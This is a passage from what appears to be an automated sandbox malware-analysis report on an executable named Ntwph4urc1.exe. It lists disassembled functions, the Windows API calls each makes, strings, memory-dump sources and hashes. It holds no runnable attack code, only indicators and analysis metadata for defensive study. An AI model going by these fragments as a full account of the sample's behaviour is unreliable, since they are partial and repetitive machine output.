                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                              • API String ID: 2624150263-2976168531
                                              • Opcode ID: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                              • Instruction ID: 411b0bed4dd1c8854bcfe70218cd405116d93f5cc49f5f9e093397eef6854a11
                                              • Opcode Fuzzy Hash: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                              • Instruction Fuzzy Hash: 78A17FB1A00209ABDB11EFA5CD81AAF77B8EF84314F10843BF601B62D1D77C99418F69
                                              Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                              • API String ID: 542301482-1275373446
                                              • Opcode ID: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                              • Instruction ID: 318f5a272383e4943f9a7a1f828131c4cf43be91e798f39f03958dcf779540d2
                                              • Opcode Fuzzy Hash: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                              • Instruction Fuzzy Hash: 67412771A00208AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                              Function 00402902 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                              • Instruction ID: c1f6bc4fbd4392edc64dd94dfb26af21a0adc514685abdce03c7c09792edecab
                                              • Opcode Fuzzy Hash: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                              • Instruction Fuzzy Hash: FAF08CB1A00104ABC700DFA4DD499AEB378EF10324F70857BE911F21E0D7B89E109B3A
                                              Function 00404DB1 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                              • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                              • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                              • DeleteObject.GDI32(00000110), ref: 00404EB2
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                              • ShowWindow.USER32(?,00000005), ref: 00405014
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                              • ImageList_Destroy.COMCTL32(?), ref: 004051E8
                                              • GlobalFree.KERNEL32(?), ref: 004051F8
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405353
                                              • ShowWindow.USER32(?,00000000), ref: 004053A1
                                              • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                              • ShowWindow.USER32(00000000), ref: 004053B3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 2564846305-813528018
                                              • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                              • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                              • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                              • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                              Function 00404503 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045A1
                                              • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045D2
                                              • GetSysColor.USER32(?), ref: 004045E3
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                              • lstrlenW.KERNEL32(?), ref: 00404604
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
                                              • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                              • SendMessageW.USER32(00000000), ref: 00404686
                                              • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                              • SetCursor.USER32(00000000), ref: 00404705
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                              • SetCursor.USER32(00000000), ref: 00404721
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404750
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: Call$N$zD@
                                              • API String ID: 3103080414-4182535457
                                              • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                              • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                              • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                              • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                              Function 0040603A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                              • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                              • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                              • wsprintfA.USER32 ref: 004060B9
                                              • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                              • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                              • API String ID: 2171350718-2304911260
                                              • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                              • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                              • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                              • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                              • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                              • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                              • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                              Function 0040669D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                              • CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                              • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                              Strings
                                              • *?|<>/":, xrefs: 004066EF
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                              • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 0040669D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-379023009
                                              • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                              • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                              • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                              • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                              Function 004043AB Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                              • GetSysColor.USER32(00000000), ref: 00404406
                                              • SetTextColor.GDI32(?,00000000), ref: 00404412
                                              • SetBkMode.GDI32(?,?), ref: 0040441E
                                              • GetSysColor.USER32(?), ref: 00404431
                                              • SetBkColor.GDI32(?,?), ref: 00404441
                                              • DeleteObject.GDI32(?), ref: 0040445B
                                              • CreateBrushIndirect.GDI32(?), ref: 00404465
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
